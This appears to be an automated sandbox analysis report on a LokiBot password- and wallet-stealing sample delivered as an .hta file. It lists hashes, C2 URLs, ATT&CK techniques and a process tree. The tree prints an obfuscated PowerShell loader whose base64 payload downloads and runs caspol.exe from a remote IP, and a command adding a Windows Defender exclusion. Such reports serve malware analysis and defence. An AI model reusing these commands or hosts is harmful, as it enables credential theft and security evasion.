lokibot | dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21

Analysis

max time kernel
134s
max time network
144s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
18-11-2024 17:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta
Size

178KB
MD5

a54bdd270a424ec79b735ef6b513c2e4
SHA1

465738a3e31b16ad80c44f3dc7bdd762e402cb51
SHA256

dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21
SHA512

598f303f9f570851f3e538dcd5d9e23717e177b3e652320a7d58dc4800a0f81d9445b719e51b0875b640460c1b4d6be7a592e738b1004c2c0490bffac8ba0c61
SSDEEP

96:4vCl1722AAZtbZfjdDINnmScJXD65zbfKZ/UQ:4vCld22AAVjBIcyzbfyUQ

Score

10^/10

lokibot collection defense_evasion discovery execution spyware stealer trojan

Malware Config

Extracted

Family

lokibot

http://94.156.177.95/maxzi/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2472	pOWERSHELl.exE

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1988	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2472	pOWERSHELl.exE
2400	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2352	caspol.exe
1624	caspol.exe

Loads dropped DLL 3 IoCs

pid	Process
2472	pOWERSHELl.exE
2472	pOWERSHELl.exE
2472	pOWERSHELl.exE

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	caspol.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2352 set thread context of 1624	2352	caspol.exe	40

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	caspol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOWERSHELl.exE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2472	pOWERSHELl.exE
2400	powershell.exe
1988	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2472	pOWERSHELl.exE
Token: SeDebugPrivilege	2400	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	1624	caspol.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 2464 wrote to memory of 2472	2464	mshta.exe	31
PID 2464 wrote to memory of 2472	2464	mshta.exe	31
PID 2464 wrote to memory of 2472	2464	mshta.exe	31
PID 2464 wrote to memory of 2472	2464	mshta.exe	31
PID 2472 wrote to memory of 2400	2472	pOWERSHELl.exE	33
PID 2472 wrote to memory of 2400	2472	pOWERSHELl.exE	33
PID 2472 wrote to memory of 2400	2472	pOWERSHELl.exE	33
PID 2472 wrote to memory of 2400	2472	pOWERSHELl.exE	33
PID 2472 wrote to memory of 2540	2472	pOWERSHELl.exE	34
PID 2472 wrote to memory of 2540	2472	pOWERSHELl.exE	34
PID 2472 wrote to memory of 2540	2472	pOWERSHELl.exE	34
PID 2472 wrote to memory of 2540	2472	pOWERSHELl.exE	34
PID 2540 wrote to memory of 2692	2540	csc.exe	35
PID 2540 wrote to memory of 2692	2540	csc.exe	35
PID 2540 wrote to memory of 2692	2540	csc.exe	35
PID 2540 wrote to memory of 2692	2540	csc.exe	35
PID 2472 wrote to memory of 2352	2472	pOWERSHELl.exE	37
PID 2472 wrote to memory of 2352	2472	pOWERSHELl.exE	37
PID 2472 wrote to memory of 2352	2472	pOWERSHELl.exE	37
PID 2472 wrote to memory of 2352	2472	pOWERSHELl.exE	37
PID 2352 wrote to memory of 1988	2352	caspol.exe	38
PID 2352 wrote to memory of 1988	2352	caspol.exe	38
PID 2352 wrote to memory of 1988	2352	caspol.exe	38
PID 2352 wrote to memory of 1988	2352	caspol.exe	38
PID 2352 wrote to memory of 1624	2352	caspol.exe	40
PID 2352 wrote to memory of 1624	2352	caspol.exe	40
PID 2352 wrote to memory of 1624	2352	caspol.exe	40
PID 2352 wrote to memory of 1624	2352	caspol.exe	40
PID 2352 wrote to memory of 1624	2352	caspol.exe	40
PID 2352 wrote to memory of 1624	2352	caspol.exe	40
PID 2352 wrote to memory of 1624	2352	caspol.exe	40
PID 2352 wrote to memory of 1624	2352	caspol.exe	40
PID 2352 wrote to memory of 1624	2352	caspol.exe	40
PID 2352 wrote to memory of 1624	2352	caspol.exe	40

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	caspol.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	caspol.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2464
- C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
  "C:\Windows\SysTEM32\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE" "PowERShell.EXE -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT ; iNvOkE-EXprEssion($(invOkE-exPreSSIoN('[sYsteM.tEXT.EncOdInG]'+[CHar]0X3A+[CHaR]0x3A+'Utf8.GEtsTriNG([sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string('+[char]34+'JEFIQ2MxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJlUkRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3piR3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZEdvU2hpRWwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZZTGlNem4sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYkcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNQmdOa1F0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLWHhFWHhxZEVFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSENjMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzY2LjYzLjE4Ny4yMzEvNjU3L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtTVGFSVC1zbGVFcCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGNhc3BvbC5leGUi'+[ChAR]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2472
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2400
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qvmrx4cu.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2540
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF29.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDF28.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2692
- - C:\Users\Admin\AppData\Roaming\caspol.exe
    "C:\Users\Admin\AppData\Roaming\caspol.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2352
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1988
  - - C:\Users\Admin\AppData\Roaming\caspol.exe
      "C:\Users\Admin\AppData\Roaming\caspol.exe"
      4⤵
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:1624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESDF29.tmp

Filesize
1KB

MD5
171aa8106716a441ce7ee396e96469a9

SHA1
595da5491e361cde5e1cb78e09faf214e56d791a

SHA256
653c38078adefa1f453b14615c04dcfe07ad7bd862c85781afa704aea1d0d289

SHA512
7a7a180d7ba7558aa0c69a2f32c9267aaa5c9cc5cd5d83bd2caae36c9bab3ea609bc91aef1cf2981e3be152e5396d7d4eece0767ba56f06b32a3a0fc41f0039b

Download Submit
C:\Users\Admin\AppData\Local\Temp\qvmrx4cu.dll

Filesize
3KB

MD5
e48ea449bdcbae330e4f633102344ed2

SHA1
a3965ad5e607e8f6ca9da235c5d64d829981dd40

SHA256
c68f7f5fd86f613254f970375c3c543c4e33fe0180f04db75c2de3e623bb8af1

SHA512
83014b98513dfe4fbfc1528aa9176138f2842f1dbaba4ab7a22c8e311b6bec3a42c151cc0b96f10fcba8eaa561530cc411ccb70a4119f627fb6d52cb6cf802e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\qvmrx4cu.pdb

Filesize
7KB

MD5
c982c21d8a278fb274db38f1e82352da

SHA1
9d9b8f2af7f7cc14765d6fdc9879da696b967932

SHA256
074f193d794ff8217b7a586b4a0976b948ea6735b0a68b14b281f6406c765826

SHA512
911a1c9ef9c9c8eb1d41df8e200be39d1563bf5fa61b5e73ce1728000db08ec296e145556a3c6fecfd503b0ca3f3bd09ceb7e0e002bd5fc09201e095a72d0438

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
f94104592811cc91c4a68e8ed0aec140

SHA1
faf40098525967cc8f3520d866a0d6f159446993

SHA256
b6c894126b6c2f477fba4afa62030fef985b07261a367e231f512a65d3dbb084

SHA512
397d1f0182ad0bf1da1867df4bd859860e9c6bf663edeadf8611a30678301deca6aeeeeb00368f837b79ad9bdcf645d20ac2f695016c49b71094c14e7fb5b282

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCDF28.tmp

Filesize
652B

MD5
20fd58f7b4a27dd951e230b753e4446d

SHA1
83a3fc556b708880588cb295da35eb50d28ea47d

SHA256
48606746578b4f8c7b74d9200fa4989c18a8ee687ae90c07c89f4e057f22156f

SHA512
6d5e9fb666e6d5155134b6c31c93a3f91e84e77c6ebb8233e3a1712c042921505f7c07660bc288c77772920e7e904f477b80831a5d3e15b86f21d8c3f8eff6b3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qvmrx4cu.0.cs

Filesize
477B

MD5
f97fc8141f59078b4354b513d3b083ac

SHA1
293904ab8d5f38a2f0764ee2e35e97e590d8c737

SHA256
f6766cc467b91c9c99186a91d4cc32ebf6803b04c9e82ba8dedd54f9dc25b32e

SHA512
87b65e67e76c334c79481d25513fb1696ab86b1d8bf6006b7436a5ba7e522e2101912315c16d92cb0bf0feb86aa9616d5ea1019054c489958ca364947abe879c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qvmrx4cu.cmdline

Filesize
309B

MD5
f46cb4f9e8e062750ca6490d9df0eee5

SHA1
c00be5627ece61cd0185fc76183caac998b39226

SHA256
a715c7bbbd68f4462a82a32e583c4753774c54354eb99fc2bd2c4f177792bca5

SHA512
d02a0b4d5e55405ef912e3c9f64b65d39138b883f23dc4f101fd8ca4e1c705534d4453c67f8d554b8176cf50f842b1e3feedf2f6ada85afd3d2a6e305da621e7

Download Submit
\Users\Admin\AppData\Roaming\caspol.exe

Filesize
570KB

MD5
80358303e33cef71434e6e4a621262c5

SHA1
e7a22b4e5af741f9b4d9982f36164b276bba459a

SHA256
f3246d0ca5ca8e69f98ca33b2c17813d5d862049dcfa9931dbcbaaaf7543a1f7

SHA512
5e68b8c63afe7c0e91396f42f485cd84946235ab11d9ce7107bbcf75568ff3087d5e14378f87d77733376e332f516f26db838b870ca580569178b15c0a90761e

Download Submit
memory/1624-46-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/1624-40-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/1624-49-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/1624-48-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1624-38-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/1624-51-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/1624-44-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/1624-42-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/2352-37-0x0000000005950000-0x00000000059B4000-memory.dmp

Filesize
400KB

Download
memory/2352-36-0x0000000000470000-0x0000000000482000-memory.dmp

Filesize
72KB

Download
memory/2352-35-0x0000000000820000-0x00000000008B4000-memory.dmp

Filesize
592KB

Download